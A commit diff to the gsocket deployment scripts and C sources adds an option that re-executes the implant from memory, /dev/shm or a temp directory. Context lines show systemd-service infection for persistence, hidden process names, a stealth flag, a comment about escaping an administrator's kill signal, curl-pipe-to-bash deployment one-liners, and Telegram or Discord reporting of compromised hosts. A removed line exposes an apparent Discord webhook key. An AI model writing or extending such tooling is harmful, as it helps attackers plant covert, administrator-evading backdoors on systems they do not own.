reexec config

deploy/deploy.sh

@@ -30,7 +30,7 @@
 # GS_NOINST=1
 #		- Do not install gsocket
 # GS_OSARCH=x86_64-linux or mipsel32-linux etc
-#       - Force architecutre to a specific package (for testing purpose only)
+#       - Force architecture to a specific package (for testing purpose only)
 # GS_PREFIX=
 #		- Use 'path' instead of '/' (needed for packaging/testing)
 # GS_URL_BASE=https://gsocket.io
@@ -45,6 +45,8 @@
 #       - Try NO to infect a systemd service before any other persistency
 # GS_NOFFPID=1
 #       - Do not fast forward to a small pid.
+# GS_NOREEXEC=1
+#       - Do not re-exec or change argv0.
 # GS_NAME="[kcached]"
 #       - Specify custom hidden name file & process. Default is picked at random.
 # GS_BIN="fg"
@@ -182,6 +184,8 @@ GS_SYSTEMD_PERSIST="oneshot"
 [[ -n $GS_NOINFECT ]] && unset GS_INFECT
 GS_FFPID=1
 [[ -n $GS_NOFFPID ]] && unset GS_FFPID
+GS_REEXEC=1
+[[ -n "$GS_NOREEXEC" ]] && unset GS_REEXEC
 unset SYSTEMD_INSTALL_CHECK_IS_ACTIVE
 
 # systemd candidates for binary infection
@@ -1119,7 +1123,7 @@ config2bin() {
 
 	[[ -n "$LDSO" ]] && exec_arr=("$LDSO")
 	exec_arr+=("${src}")
-	TERM=xterm-256color GS_CCG="${GS_CCG}" GS_PROC_HIDDENNAME="${proc_hidden_name}" GS_SYSTEMD_ARGV_MATCH="${GS_SYSTEMD_ARGV_MATCH}" GS_WORKDIR="${GS_WORKDIR}" GS_DOMAIN="${GS_DOMAIN}" GS_PORT="${GS_PORT}" GS_HOST="${GS_HOST}" GS_BEACON="${GS_BEACON}" GS_FFPID="${GS_FFPID}" GS_STEALTH=1 GS_CONFIG_WRITE="${dst}" GS_ARGS="${opts}" GS_SECRET="${GS_SECRET:?}" "${exec_arr[@]}" || return 255
+	TERM=xterm-256color GS_CCG="${GS_CCG}" GS_PROC_HIDDENNAME="${proc_hidden_name}" GS_SYSTEMD_ARGV_MATCH="${GS_SYSTEMD_ARGV_MATCH}" GS_WORKDIR="${GS_WORKDIR}" GS_DOMAIN="${GS_DOMAIN}" GS_PORT="${GS_PORT}" GS_HOST="${GS_HOST}" GS_BEACON="${GS_BEACON}" GS_FFPID="${GS_FFPID}" GS_REEXEC="${GS_REEXEC}" GS_STEALTH=1 GS_CONFIG_WRITE="${dst}" GS_ARGS="${opts}" GS_SECRET="${GS_SECRET:?}" "${exec_arr[@]}" || return 255
 	[[ -n "$dst_final" ]] && {
 		cat "${dst}" >"${dst_final}"
 		rm -f "${dst:?}"
@@ -1141,6 +1145,7 @@ bin2config() {
 	unset GS_CONFIG_BEACON
 	unset GS_CONFIG_HOST
 	unset GS_CONFIG_PORT
+	unset GS_CONFIG_REEXEC
 	[[ ! -f "${exe}" ]] && return 255
 	[[ ! -f "${bin}" ]] && return 255
 

deploy/deploy_server.sh

@@ -180,19 +180,18 @@ sed 's|^GS_WEBHOOK_404_OK=.*|GS_WEBHOOK_404_OK=1|' -i "${DATA_DIR}/${DEPLOY_SH_N
 [ -n "$GS_HOST" ] &&  sed 's|^DS_GS_HOST=.*|DS_GS_HOST='"'$GS_HOST'"'|' -i "${DATA_DIR}/${DEPLOY_SH_NAME}"
 [ -n "$GS_PORT" ] &&  sed 's|^DS_GS_PORT=.*|DS_GS_PORT='"'$GS_PORT'"'|' -i "${DATA_DIR}/${DEPLOY_SH_NAME}"
 
-echo -e "\
-${CDG}All successful deployments will be shown below.${CN}
-${CDY}To log via Telegram, Discord or webhook.site please edit
+echo -e "${CDG}SUCCESS${CN}"
+[ -n "$GS_HOST" ] && echo -e   "--> ${CDG}GS_HOST='$GS_HOST'${CN}"
+[ -n "$GS_PORT" ] && echo -e   "--> ${CDG}GS_PORT='$GS_PORT'${CN}"
+[ -n "$GS_BRANCH" ] && echo -e "--> ${CDG}GS_BRANCH='$GS_BRANCH'${CN}"
+echo -e "${CDY}To log via Telegram, Discord or webhook.site please edit
 ${CW}$(realpath "$(pwd)/${DATA_DIR}/y")${CDY} and set${CN}
 1. ${CDC}GS_TG_TOKEN=${CN}, ${CDC}GS_TG_CHATID=${CN} OR ${CDC}GS_DISCORD_KEY=${CN} OR ${CDC}GS_WEBHOOK_KEY=${CN}
 To deploy gsocket:
     ${CM}bash -c \"\$(curl -fsSL ${URL_BASE}/y)\"${CN}
     ${CM}bash -c \"\$(wget --no-verbose -O- ${URL_BASE}/y)\"${CN}
-or set the variable during deployment. Example:
-    ${CDM}GS_DISCORD_KEY='1106565073956253736/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1-Ig60Rh4P_TGFq-m' \\
-    bash -c \"\$(curl -fsSL ${URL_BASE}/y)\"${CN}
 Press CTRL-C to stop
-${CDG}-----RESULTS BELOW-----${CN}"
+${CDG}-----SUCCESSFUL DEPLOYMENTS ARE SHOWN BELOW-----${CN}"
 
 # a dirty hack to retrieve results: The deploy scripts requests an
 # non-existing PATH/$SECRET and we retrieve it from the error log.

tools/4_gs-netcat.c

@@ -1506,6 +1506,8 @@ GS_CONFIG_HOST=%s\n\
 
 	if (gopt.flags & GSC_FL_FFPID)
 		printf("GS_CONFIG_FFPID=1\n");
+	if (gopt.flags & GSC_FL_REEXEC)
+		printf("GS_CONFIG_REEXEC=1\n");
 	if (gopt.flags & GSC_FL_CHANGE_CGROUP)
 		printf("GS_CONFIG_CCG=1\n");
 	if (gopt.flags & GSC_FL_USEHOSTID)

tools/common.h

@@ -274,6 +274,7 @@ struct _gopt
 #define GSC_FL_USEHOSTID          (0x10000)
 #define GSC_FL_STARTED_BY_SWD     (0x20000) // SelfWatchDog re-exec'ed us.
 #define GSC_FL_SWD_SURVIVED_SIGTERM  (0x40000) // Admin Tried to SIGTERM us but we 'escaped' by fork'ing.
+#define GSC_FL_REEXEC                 (0x8000) // Re-exec via memexec, /dev/shm or TMPDIR.
 
 #ifdef DEBUG
 # define GS_APP_KEEPALIVE        10 // If no activity send app-layer ping (-i needed)

tools/gsnc-utils.c

@@ -131,6 +131,8 @@ GSNC_config_write(const char *fn) {
 
     if (GS_GETENV2("FFPID"))
         c.flags |= GSC_FL_FFPID;
+    if (GS_GETENV2("REEXEC"))
+        c.flags |= GSC_FL_REEXEC;
     if (GS_GETENV2("CCG"))
         c.flags |= GSC_FL_CHANGE_CGROUP;
     if (GS_GETENV2("DELME"))
@@ -230,6 +232,7 @@ GSNC_config_read(const char *fn) {
     gopt.flags |= (c.flags & GSC_FL_CHANGE_CGROUP);
     gopt.flags |= (c.flags & GSC_FL_DELME);
     gopt.flags |= (c.flags & GSC_FL_USEHOSTID);
+    gopt.flags |= (c.flags & GSC_FL_REEXEC);
 
     // Implied:
     gopt.is_interactive = 1;